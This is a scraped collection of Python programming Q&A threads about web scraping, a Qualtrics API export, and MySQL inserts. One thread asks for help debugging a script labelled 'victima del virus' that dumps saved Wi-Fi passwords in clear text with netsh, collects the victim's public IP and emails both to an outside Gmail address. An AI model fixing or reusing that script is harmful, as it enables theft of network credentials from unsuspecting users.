python error: request isn't defined - python-3.x

I am trying to learn how to automatically fetch urls from a page. In the following code I am trying to get the port co-ordinates of the webpage from different links:
import urllib.request
import re
a = input("What country is your port in?: ")
b = input("What is the name of the port?: ")
url = "http://ports.com/"
totalurl = "http://ports.com/" + a + "/" + b + "/"
htmlfile = request.urlopen(url)
htmltext = htmlfile.read()
regex = '<span class="small'+ a + "/" + b + "/" '">...</span>'
pattern = re.compile(regex)
with urllib.request.urlopen(url) as response:
html = response.read().decode()
num = re.findall(pattern, html)
print(num)
This is the error message I receive:
What country is your port in?: greece
What is the name of the port?: port-of-eleusis
Traceback (most recent call last):
File "/Users/kieronblemings/Desktop/PROGRAMS PYTHON/ports extraction.py", line 13, in <module>
htmlfile = request.urlopen(url)
NameError: name 'request' is not defined

Related

TypeError: sequence item 4: expected str instance, _io.TextIOWrapper found in PYTHON 3.8.1

IM SPANISH SO SOME PARTS OF THE CODE (specially names and other things)
python gives me this error
i wanna help cuz im new in python and fixing errors its not my special hability (sorry for my english im spanish)
Traceback (most recent call last):
File "C:\Users\Ticua\Desktop\#test with ip.py", line 38, in <module>
BODY = '\r\n'.join(['To: %s' % TO, 'From: %s' % gmail_sender,'Subject: victima del virus', ip, f])
TypeError: sequence item 4: expected str instance, _io.TextIOWrapper found
%%MYPASSWORD%% is the password of the mail that i dont wanna be discovered
my code :
import subprocess
requests = 'requests'
subprocess.call(['pip', 'install', requests])
from requests import get
import smtplib
ip = str(get('https://api.ipify.org').text)
y = 'C:'
reques = input("pon el nombre de tu red : ")
x = str(subprocess.call(['netsh', 'wlan', 'export', 'profile', 'key=clear', 'folder=C:']))
f = open('C:' + '/Conexión de red inalámbrica-' + reques + '.xml', 'r')
TO = 'ticua07#gmail.com'
SUBJECT = 'victima del virus'
TEXT = ip, f
# Gmail Sign In
gmail_sender = 'logonuihacks#gmail.com'
gmail_passwd = '%%MYPASSWORD%%'
server = smtplib.SMTP('smtp.gmail.com', 587)
server.ehlo()
server.starttls()
server.login(gmail_sender, gmail_passwd)
BODY = '\r\n'.join(['To: %s' % TO, 'From: %s' % gmail_sender,'Subject: victima del virus', ip, f])
f.close()
try:
server.sendmail(gmail_sender, [TO], BODY)
print ('email sent')
except:
print("fu***d up")

Download survey results from Qualtrics into Python

I am trying to directly get the data responses from Qualtrics directly into a pandas dataframe python. Is there a way of doing so?
import shutil
import os
import requests
import zipfile
import json
import io
# Setting user Parameters
# apiToken = "myKey"
# surveyId = "mySurveyID"
# fileFormat = "csv"
# dataCenter = "az1"
apiToken = "HfDjOn******"
surveyId = "SV_868******"
fileFormat = "csv"
dataCenter = 'uebs.eu'
# Setting static parameters
requestCheckProgress = 0
progressStatus = "in progress"
baseUrl = "https://{0}.qualtrics.com/API/v3/responseexports/".format(dataCenter)
headers = {
"content-type": "application/json",
"x-api-token": apiToken,
}
Then for # Step 1: Creating Data Export
downloadRequestUrl = baseUrl
then when i try to access the url from my chrom it gives me the following
{"meta":{"httpStatus":"404 - Not Found","error":{"errorMessage":"The requested resource does not exist."}}}
Which I believe the main reason why after running this code
# Step 1: Creating Data Export
downloadRequestUrl = baseUrl
downloadRequestPayload = '{"format":"' + fileFormat + '","surveyId":"' + surveyId + '"}'
downloadRequestResponse = requests.request("POST", downloadRequestUrl, data=downloadRequestPayload, headers=headers)
progressId = downloadRequestResponse.json()["result"]["id"]
print(downloadRequestResponse.text)
It gives me this error
---------------------------------------------------------------------------
KeyError Traceback (most recent call last)
<ipython-input-38-cd611e49879c> in <module>
3 downloadRequestPayload = '{"format":"' + fileFormat + '","surveyId":"' + surveyId + '"}'
4 downloadRequestResponse = requests.request("POST", downloadRequestUrl, data=downloadRequestPayload, headers=headers)
----> 5 progressId = downloadRequestResponse.json()["result"]["id"]
6 print(downloadRequestResponse.text)
KeyError: 'result
I am somehow new to Qualtrics/python interface may someone share why I am having this difficulty is it because of the dataCenter?
Thank you

Insert dynamic data to mysql with python

EDITED >>>>>
I write some code which return two outputs but an error appears.
What is the main problem of my code?
from urllib.request import urlopen as uReq
from bs4 import BeautifulSoup as soup
import os
import sys
import codecs
from urllib.request import urlopen
import pymysql
import mysql.connector
for i in range(1): #electronic
my_url = "https://www.xxxxx.com/mobile_phones/?facet_is_mpg_child=0&viewType=gridView&page="
uClient = uReq(my_url + str(i))
page_html = uClient.read()
uClient.close()
page_soup = soup(page_html, "html.parser")
containers = page_soup.findAll("div" , {"class" : "sku -gallery" })
for container in containers:
name = container.img["alt"]
title_container = container.findAll("span", {"class" : "brand"})
Brand = title_container[0].text
price = container.findAll("span",{"class" : "price"} )
price_one = price[0].text.strip()
price_old = container.findAll("span",{"class" : "price -old "})
price_two = '0'
if len(price_old) > 0:
price_two = price_old[0].text.strip()
rank = container.findAll("span",{"class" : "rating-aggregate"})
ranking = 'N/A'
if len(rank) > 0:
ranking = rank[0].text.strip()
conn = pymysql.connect(host="localhost",user="root",passwd="",db="prod")
x = conn.cursor()
#name1 = name()
#brand1 = Brand()
#price_one1 = price_one1()
#price_two1= price_one1()
#rank1 = rank()
x.execute("INSERT INTO list (productname,brand,price1,price2,rank) VALUES (%s,%s,%s,%s.%s)" , (name,Brand,price_one,price_two,ranking))
conn.commit()
conn.close()
C:\Users\xxxx\AppData\Local\Programs\Python\Python35\python.exe
C:/Users/xxxx/.PyCharm2018.2/config/scratches/bd.py Traceback (most
recent call last): File
"C:/Users/xxxx/.PyCharm2018.2/config/scratches/bd.py", line 54, in
x.execute("INSERT INTO list (productname,brand,price1,price2,rank) VALUES (%s,%s,%s,%s.%s)" , (name,Brand,price_one,price_two,ranking))
File
"C:\Users\xxxx\AppData\Local\Programs\Python\Python35\lib\site-packages\pymysql\cursors.py",
line 170, in execute
result = self._query(query) File "C:\Users\xxxx\AppData\Local\Programs\Python\Python35\lib\site-packages\pymysql\cursors.py",
line 328, in _query
conn.query(q) File "C:\Users\xxxx\AppData\Local\Programs\Python\Python35\lib\site-packages\pymysql\connections.py",
line 516, in query
self._affected_rows = self._read_query_result(unbuffered=unbuffered) File
"C:\Users\xxxx\AppData\Local\Programs\Python\Python35\lib\site-packages\pymysql\connections.py",
line 727, in _read_query_result
result.read() File "C:\Users\xxxx\AppData\Local\Programs\Python\Python35\lib\site-packages\pymysql\connections.py",
line 1066, in read
first_packet = self.connection._read_packet() File "C:\Users\xxxx\AppData\Local\Programs\Python\Python35\lib\site-packages\pymysql\connections.py",
line 683, in _read_packet
packet.check_error() File "C:\Users\xxxx\AppData\Local\Programs\Python\Python35\lib\site-packages\pymysql\protocol.py",
line 220, in check_error
err.raise_mysql_exception(self._data) File "C:\Users\xxxx\AppData\Local\Programs\Python\Python35\lib\site-packages\pymysql\err.py",
line 109, in raise_mysql_exception
raise errorclass(errno, errval) pymysql.err.ProgrammingError: (1064, "You have an error in your SQL syntax; check the manual that
corresponds to your MariaDB server version for the right syntax to use
near '.'2')' at line 1")
Process finished with exit code 1
The problem is with the variable rank. You are supposed to pass ranking but you missed it somehow.
by the code you have given,
rank = container.findAll("span",{"class" : "rating-aggregate"}) # resultset
if len(rank) > 0:
ranking = rank[0].text.strip() #result
So the change is
x.execute("INSERT INTO list (productname,brand,price1,price2,rank) VALUES (%s,%s,%s,%s.%s)" , (name,Brand,price_one,price_two,ranking))
and you are ready to go! I have some suggestions for you. if you are using if condition always give an else condition or a default value for the variable getting declared within the conditional statement. Or else you might end up in error when the condition fails. Like,
rank = container.findAll("span",{"class" : "rating-aggregate"})
ranking = rank[0].text.strip() if len(rank) > 0 else 'N/A'
Or,
rank = container.findAll("span",{"class" : "rating-aggregate"})
ranking = 'N/A'
if len(rank) > 0:
ranking = rank[0].text.strip()
Cheers!
This code stores the information on the csv file, but now I need to save it to mysql.
from urllib.request import urlopen as uReq
from bs4 import BeautifulSoup as soup
import os
import sys
import unicodecsv as csv
import codecs
from urllib.request import urlopen
for i in range(3): #electronic
my_url = "https://www.xxxx.com/mobile_phones/?facet_is_mpg_child=0&viewType=gridView&page="
uClient = uReq(my_url + str(i))
page_html = uClient.read()
uClient.close()
page_soup = soup(page_html, "html.parser")
containers = page_soup.findAll("div" , {"class" : "sku -gallery" })
filename = "mobile.csv"
f = codecs.open(filename, "a" , "utf-8-sig")
headers = "name, Brand, price_one, price_two, ranking\n"
f.write(headers)
for container in containers:
name = container.img["alt"]
title_container = container.findAll("span", {"class" : "brand"})
Brand = title_container[0].text
price = container.findAll("span",{"class" : "price"} )
price_one = price[0].text.strip()
price_old = container.findAll("span",{"class" : "price -old "})
price_two = 0
if len(price_old) > 0:
price_two = price_old[0].text.strip()
rank = container.findAll("span",{"class" : "rating-aggregate"})
if len(rank) > 0:
ranking = rank[0].text.strip()
print("name " + name)
print("Brand "+ Brand)
print("price_one " + price_one)
print("price_two {}".format(price_two)) #---->
print("ranking " + ranking)
f.write(name + "," + Brand.replace(",", "|") + "," + price_one.replace(",", "") + "," + price_two.replace(",", "") + "," + ranking + "\n")
f.close()

AttributeError: 'str' object has no attribute 'text' python 2.7

Ik there are many questions like this but the answers are all specific and can only fix the solution for the persons specific script.
I am currently trying to print a bunch of info from supremenewyork.com
from the uk website. This script can succsesfully print all the info I want from supreme us but when I added the proxy script I starte to get alot of errors.
I know the prxy script works becuase I tested it on a small scipt and It was able to pull info that was on supreme uk and didnt exist on supreme us
Here is my script.
import requests
from bs4 import BeautifulSoup
UK_Proxy1 = raw_input('UK http Proxy1: ')
UK_Proxy2 = raw_input('UK http Proxy2: ')
proxies = {
'http': 'http://' + UK_Proxy1 + '',
'https': 'http://' + UK_Proxy2 + '',
}
categorys = ['jackets','shirts','tops_sweaters','sweatshirts','pants','shorts','t- shirts','hats','hats','bags','accessories','shoes','skate']
catNumb = 0
altArray = []
nameArray = []
styleArray = []
for cat in categorys:
catStr = str(categorys[catNumb])
cUrl = 'http://www.supremenewyork.com/shop/all/' + catStr
proxy_script = requests.get((cUrl.text), proxies=proxies)
bSoup = BeautifulSoup(proxy_script, 'lxml')
print('\n*******************"'+ catStr.upper() + '"*******************\n')
catNumb += 1
for item in bSoup.find_all('div', class_='inner-article'):
url = item.a['href']
alt = item.find('img')['alt']
req = requests.get('http://www.supremenewyork.com' + url)
item_soup = BeautifulSoup(req.text, 'lxml')
name = item_soup.find('h1', itemprop='name').text
style = item_soup.find('p', itemprop='model').text
print alt +(' --- ')+ name +(' --- ')+ style
altArray.append(alt)
nameArray.append(name)
styleArray.append(style)
print altArray
print nameArray
print styleArray
I am getting this error when I execute the script
AttributeError: 'str' object has no attribute 'text' with the error pointing towards the
proxy_script = requests.get((cUrl.text), proxies=proxies)
i recently added this to the script which sorta fixed it... It was able to print the category's but no info between them. Which (I NEED) it just printed ****************jackets**************, ****shirts******, etc.... here is what I changed
import requests
from bs4 import BeautifulSoup
# make sure proxy is http and port 8080
UK_Proxy1 = raw_input('UK http Proxy1: ')
UK_Proxy2 = raw_input('UK http Proxy2: ')
proxies = {
'http': 'http://' + UK_Proxy1 + '',
'https': 'http://' + UK_Proxy2 + '',
}
categorys = ['jackets','shirts','tops_sweaters','sweatshirts','pants','shorts','t-shirts','hats','bags','accessories','shoes','skate']
catNumb = 0
altArray = []
nameArray = []
styleArray = []
for cat in categorys:
catStr = str(categorys[catNumb])
cUrl = 'http://www.supremenewyork.com/shop/all/' + catStr
proxy_script = requests.get(cUrl, proxies=proxies).text
bSoup = BeautifulSoup(proxy_script, 'lxml')
print('\n*******************"'+ catStr.upper() + '"*******************\n')
catNumb += 1
for item in bSoup.find_all('div', class_='inner-article'):
url = item.a['href']
alt = item.find('img')['alt']
req = requests.get('http://www.supremenewyork.com' + url)
item_soup = BeautifulSoup(req.text, 'lxml')
name = item_soup.find('h1', itemprop='name').text
style = item_soup.find('p', itemprop='model').text
print alt +(' --- ')+ name +(' --- ')+ style
altArray.append(alt)
nameArray.append(name)
styleArray.append(style)
print altArray
print nameArray
print styleArray
I put .text at the end and it worked sorta.... How do i fix it so it prints the info I want???
I think you miss smt. Your cUrl is a string type, not request type. I guess you want:
proxy_script = requests.get(cUrl, proxies=proxies).text

how can I convert these outputted coordinates to standard looking ones?

I have this code that outputs coordinates for a port:
import urllib
import urllib.request as request
import re
a = input("What country is your port in?: ")
b = input("What is the name of the port?: ")
url = "http://ports.com/"
country = ["united-kingdom","greece"]
ports = ["port-of-eleusis","portsmouth-continental-ferry-port","poole-harbour"]
totalurl = "http://ports.com/" + a + "/" + b + "/"
htmlfile = urllib.request.urlopen(totalurl)
htmltext = htmlfile.read()
regex = '<strong>Coordinates:</strong>(.*?)</span>'
pattern = re.compile(regex)
with urllib.request.urlopen(totalurl) as response:
html = htmltext.decode()
num = re.findall(pattern, html)
print(num)
The output is correct and readable but I need the coordinates to something like this format: 39°09'24.6''N 175°37'55.8''W instead of :
>>> [' 50°48′41.04″N 1°5′31.31″W']
Your error is caused because HTML internally uses these codes to display specific unicode characters, while python does not. To fix this, replace print(num) with print(list(i.replace('°', "°").replace('′',"′").replace('″',"″") for i in num))
This essentially replaces ° with °, ′ with ′, and ″ with ″.
>>> print(list(i.replace('°', "°").replace('′',"′").replace('″',"″") for i in num))
[" 50°48′41.04″N 1°5′31.31″W"]
>>>

Resources